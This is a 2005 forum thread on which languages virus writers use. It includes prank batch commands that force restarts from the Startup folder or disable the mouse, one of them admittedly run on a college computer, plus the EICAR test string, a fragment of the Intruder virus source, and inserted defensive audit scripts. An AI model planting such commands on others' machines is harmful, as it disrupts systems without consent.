# Language of Virus Writers



## Satissh S (Apr 10, 2005)

Can somebody explain to me in what languages viruses are written? The Fasttrack book was nice! But I want to know whether the conventional C and C++ are the languages used for writing viruses. Do the virus programmers put the replicating code inside an infinite (for) loop!? Somebody explain, please? How can they modify another program's coding? :roll:


----------



## amitsaudy (Apr 10, 2005)

Most virus writers prefer high-level languages such as C, C++ etc.
Also, scripting languages such as Perl, VBScript and JavaScript are used extensively by virus writers.
But for hardcore virus writers the favourite choice is pure and simple ASSEMBLY language, where you have no limitations at all.


----------



## khattam_ (Apr 10, 2005)

Viruses exist in different forms and nature...... If you consider a program that harms you as a virus, then a virus can be written in anything from Notepad to Turbo C++. No limitations at all. You can write a virus in any programming language. It depends upon your knowledge and creativity, and no programming language will limit you...........


----------



## Ashootosh (Apr 11, 2005)

Well said, khattam.........
Even a two-line batch file can become a virus (even though not very harmful). Check it out, I did this on my college computer (they were using XP):

In Notepad:

```
@echo off
shutdown -r
@echo on
```

Then I saved it as a.bat in the Startup folder, and after this whenever the PC starts it restarts automatically after 60 secs........


----------



## hpotter606 (Apr 11, 2005)

Can you post the solution too???
So that I can try it!!


----------



## vasanth_12345 (Apr 11, 2005)

Your creativity is the limit, man. Looking at the number of viruses gives you the answer. Anyway, Ashootosh, can you explain to me what you have done? I can understand that you have placed it as one of the startup files. About that echo off and echo on, that is where I don't understand even a bit.


----------



## swatkat (Apr 11, 2005)

If you use "@echo off", subsequent commands in the batch file after this statement do not get displayed. "@echo on" does the reverse of "@echo off".


----------



## khattam_ (Apr 12, 2005)

hpotter606 said:
			
		

> Can you post the solution too???
> So that I can try it!!


What kinda solution??


----------



## ctrl_alt_del (Apr 12, 2005)

He probably wants to know how you can undo the auto-shutdown effect once he has tried it somewhere.

I think deleting the batch file would suffice, of course within the 60 secs!


----------



## Ashootosh (Apr 13, 2005)

The solution is: shutdown -a
It will stop the PC from shutting down.

Try shutdown/? for more commands.

XP has many hidden features; try exploring all those.


----------



## shaunak (Apr 14, 2005)

Satissh S said:
			
		

> Can somebody explain to me in what languages viruses are written? The Fasttrack book was nice! But I want to know whether the conventional C and C++ are the languages used for writing viruses. Do the virus programmers put the replicating code inside an infinite (for) loop!? Somebody explain, please? How can they modify another program's coding? :roll:



Isn't the "for" loop only for Java?


----------



## pirates1323 (Apr 14, 2005)

khattam_ said:
			
		

> If you consider a program that harms you as a virus then Virus can be written in Notepad to Turbo C++. No limitations at all.



8) 8) In Notepad.. cool..... tell me how I can


----------



## Satissh S (Apr 14, 2005)

shaunak said:
			
		

> Satissh S said:
> 
> 
> 
> ...


No, the for loop is a basic loop structure that is in almost every programming language. It was designed for the elimination of the GOTO statement from programs using the basic 7 control structures, viz.
sequence, three selection, three repetition.


----------



## khattam_ (Apr 14, 2005)

Ashootosh said:
			
		

> *solution is->-> shutdown -a*
> it will stop pc from shutting down
> 
> try shutdown/? for more commands
> ...


Not a very good solution.............. This has to be done every time you restart and if the command is in the Batch file, not sure if it works........................
Deleting the Batch file or editing the line containing the Shutdown command will do..............


----------



## khattam_ (Apr 14, 2005)

pirates1323 said:
			
		

> khattam_ said:
> 
> 
> 
> ...


Write the following command in *notepad* and save the text as "Virus.bat". Plus, open the autoexec.bat in *notepad* and add a line containing the path of the batch file you saved...............
This will disable your mouse................................. (works in Win98)


```
c:\windows\rundll.exe mouse,disable
```


Many Viral codes (eg Javascripts) can also be written in notepad........

I just mean to say that there is no specific language for writing viruses........


----------
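Added example, not part of any post in this thread: a small Python audit that reads startup scripts and flags the commands discussed above (a forced `shutdown`, `tsshutdn`, and the `rundll ... ,disable` call), which is the check an administrator would run before deleting or editing the offending line. The function names and the file names in `SAMPLES` are assumptions of this example; the script contents are constructed from the snippets posted in the thread.

```python
# Added example: flag startup scripts that run the commands discussed in this thread.
# SAMPLES is constructed from the posted snippets; the file names are illustrative.
SAMPLES = {
    r"Startup\a.bat": "@echo off\nshutdown -r \n@echo on\n",
    r"C:\Virus.bat": r"c:\windows\rundll.exe mouse,disable" + "\n",
    r"C:\undo.bat": "shutdown -a\n",  # abort only, must not be flagged
}


def classify_line(line):
    """Return a reason string if the batch line is a nuisance command, else None."""
    line = line.strip().lstrip("@").strip().lower()
    if not line or line.startswith(("rem ", "::")):
        return None  # blank line or comment
    tokens = line.split()
    cmd = tokens[0].rsplit("\\", 1)[-1]  # drop any directory prefix
    if cmd.endswith(".exe"):
        cmd = cmd[:-4]
    args = tokens[1:]
    if cmd == "shutdown" and any(a in ("-r", "/r", "-s", "/s") for a in args):
        return "forced shutdown/restart"
    if cmd == "tsshutdn":
        return "terminal-services shutdown"
    if cmd in ("rundll", "rundll32") and "".join(args).endswith(",disable"):
        return "device disabled via rundll"
    return None


def audit_script(name, text):
    """List (file, line number, reason) for every flagged line in one script."""
    return [(name, n, reason)
            for n, raw in enumerate(text.splitlines(), 1)
            if (reason := classify_line(raw))]


def audit_all(scripts):
    """Run audit_script over a mapping of file name -> script text."""
    findings = []
    for name, text in scripts.items():
        findings.extend(audit_script(name, text))
    return findings


if __name__ == "__main__":
    for name, lineno, reason in audit_all(SAMPLES):
        print(f"{name}:{lineno}: {reason}")
```
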



## Ashootosh (Apr 19, 2005)

KHATTAM WROTE:


> Not a very good solution.............. This has to be done every time you restart and if the command is in the Batch file, not sure if it works........................
> Deleting the Batch file or editing the line containing the Shutdown command will do..............



I was telling him the technical solution................. not something lame as DELETING the batch file. Anybody can think about this solution, no need to post this kind of lame solution!!!!!!!!!


----------



## khattam_ (Apr 19, 2005)

Ashootosh said:
			
		

> khAttAm_ said:
> 
> 
> 
> ...



The problem was lame too.............. and so are you.............


----------



## amitsaudy (Apr 20, 2005)

hee hee


----------



## khattam_ (Apr 20, 2005)

amitsaudy said:
			
		

> hee hee


Hey man
What's the hehe about?? hehe


----------



## krishnathelord (Apr 21, 2005)

The main question still remains: what is the language the hackers use?


----------



## plasmafire (Apr 21, 2005)

lolz.. I love ASM embedded in C for destructive things (formatting, burning chips, platters etc.)
VB for minor annoyances.
C++ for DOS attacks & other network attacks..

love it!!


----------



## khattam_ (Apr 21, 2005)

Copy the contents from below, paste them into Notepad, save the file and scan it with an antivirus (I used Kaspersky)........

-----------------------Cut from here-------------------------------

```
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 
Echo `Virus in a Notepad`
cls
echo 'lol
echo 'Virus
echo 'I'm _khAttAm_
echo save it as a text file.....................
echo 'LOL
```

------------------------Cut from here-------------------------------

It should be treated as a virus. My Kaspersky does treat it as a virus. Hehe, but it is NOT a virus and does no harm to your computer.


----------
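Added example, not part of any post in this thread: EICAR's definition of its test file requires the 68-character string at the very start of the file, followed by nothing except whitespace (space, tab, LF, CR, Ctrl-Z) and no more than 128 bytes in total. This Python function classifies a buffer against that rule; the function name, the labels and the `POSTED` sample (constructed from the first lines of the post above) are this example's own.

```python
# Added example: classify a buffer against the EICAR test-file definition.

# The 68-character test string, as quoted in the post above.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Trailing bytes the definition tolerates: space, tab, LF, CR, Ctrl-Z.
ALLOWED_TRAILING = b" \t\n\r\x1a"
MAX_TOTAL_LEN = 128

# Constructed sample: the test string followed by batch lines, as in the post.
POSTED = EICAR + b" \r\nEcho `Virus in a Notepad`\r\ncls\r\n"


def classify(data: bytes) -> str:
    """Return how the buffer relates to the EICAR test file.

    "conformant"      starts with the string, only allowed whitespace after,
                      total length within 128 bytes
    "prefix-only"     starts with the string but has other content or is too long
    "contains-string" the string appears, but not at offset 0
    "absent"          the string does not appear at all
    """
    if not data.startswith(EICAR):
        return "contains-string" if EICAR in data else "absent"
    tail = data[len(EICAR):]
    if len(data) > MAX_TOTAL_LEN:
        return "prefix-only"
    if any(byte not in ALLOWED_TRAILING for byte in tail):
        return "prefix-only"
    return "conformant"


if __name__ == "__main__":
    samples = {
        "bare string": EICAR,
        "string + CRLF": EICAR + b"\r\n",
        "as posted": POSTED,
        "string after other text": b"echo " + EICAR,
    }
    for label, blob in samples.items():
        print(f"{label}: {classify(blob)}")
```

Scanners differ in how strictly they apply the definition, so a product may still flag a prefix-only file.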



## qarch (Apr 22, 2005)

Hi everyone! Are you trying to make a virus writer out of the thread initiator Satissh S?


----------



## BONZI (Apr 22, 2005)

These are not harmful, man. It's just a prank.


----------



## Ashootosh (Apr 25, 2005)

Sorry khattam, I was not here to answer you. I think you are a bit confused, the problem was not mine, I was not the one who started this thread, and I was quite surprised to see a lame person calling me lame.

And I agree with bonzi, these little tricks are just for fun, not actual harmful viruses........


----------



## girish_b (Apr 29, 2005)

khattam_ said:
			
		

> Ashootosh said:
> 
> 
> 
> ...



One best place to find all of these command parameters is Windows XP Help and Support.


----------



## Ashootosh (Apr 29, 2005)

You can also find a lot of these commands in the system32 directory.
Just go there from cmd and type --- dir *.exe/p
You will find some more interesting commands like tsshutdn (you can even turn off a computer in a LAN) etc. etc.


----------



## Satissh S (May 29, 2005)

Hey guys, I saw the following in a book, "*How do Viruses Work*". The hexadecimal listing of the Intruder virus is as follows:

The assembly language listing of the Intruder virus follows:
```
;The Intruder Virus is an EXE file infector which can jump from directory to
;directory and disk to disk. It attaches itself to the end of a file and
;modifies the EXE file header so that it gets control first, before the host
;program. When it is done doing its job, it passes control to the host program,
;so that the host executes without a hint that the virus is there.

        .SEQ                    ;segments must appear in sequential order
                                ;to simulate conditions in active virus

;MGROUP GROUP   HOSTSEG,HSTACK  ;Host segments grouped together

;HOSTSEG program code segment. The virus gains control before this routine and
;attaches itself to another EXE file. As such, the host program for this
;installer simply tries to delete itself off of disk and terminates. That is
;worthwhile if you want to infect a system with the virus without getting
;caught. Just execute the program that infects, and it disappears without a
;trace. You might want to name the program something more innocuous, though.

HOSTSEG SEGMENT BYTE
        ASSUME  CS:HOSTSEG,SS:HSTACK

PGMSTR  DB      'INTRUDER.EXE',0

HOST:
        mov     ax,cs           ;we want DS=CS here
        mov     ds,ax
        mov     dx,OFFSET PGMSTR
        mov     ah,41H
        int     21H             ;delete this exe file
        mov     ah,4CH
        mov     al,0
        int     21H             ;terminate normally
HOSTSEG ENDS

;Host program stack segment
HSTACK  SEGMENT PARA STACK
        db      100H dup (?)    ;100H (256) bytes long
HSTACK  ENDS
```


*What do the above lines convey?*


----------



## visvo (Jun 1, 2005)

Hey! You can read Ankit Fadia's "Unofficial Guide to Ethical Hacking" or check him online at www.ankitfadia.com. This Delhi guy has got all the answers to your questions in his book.


----------



## maverickrohan (Jun 2, 2005)

@Khattam

Dude.... that "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" is just a virus signature.......... without the body, obviously it's not the complete virus......... don't tell people to try such silly stuff.......... you can put thousands of signatures in Notepad and scan them and it'll be detected as a virus.............

P.S.: there was no need for you to add the remaining lines...........

Well, Python is one more language used by virus writers.......


@satis
That's just a HEX dump you've posted out there........ you need to reverse engineer it to figure out what it means...

@<everyone>
try

www.exetools.com     for some interesting stuff...!!!


----------

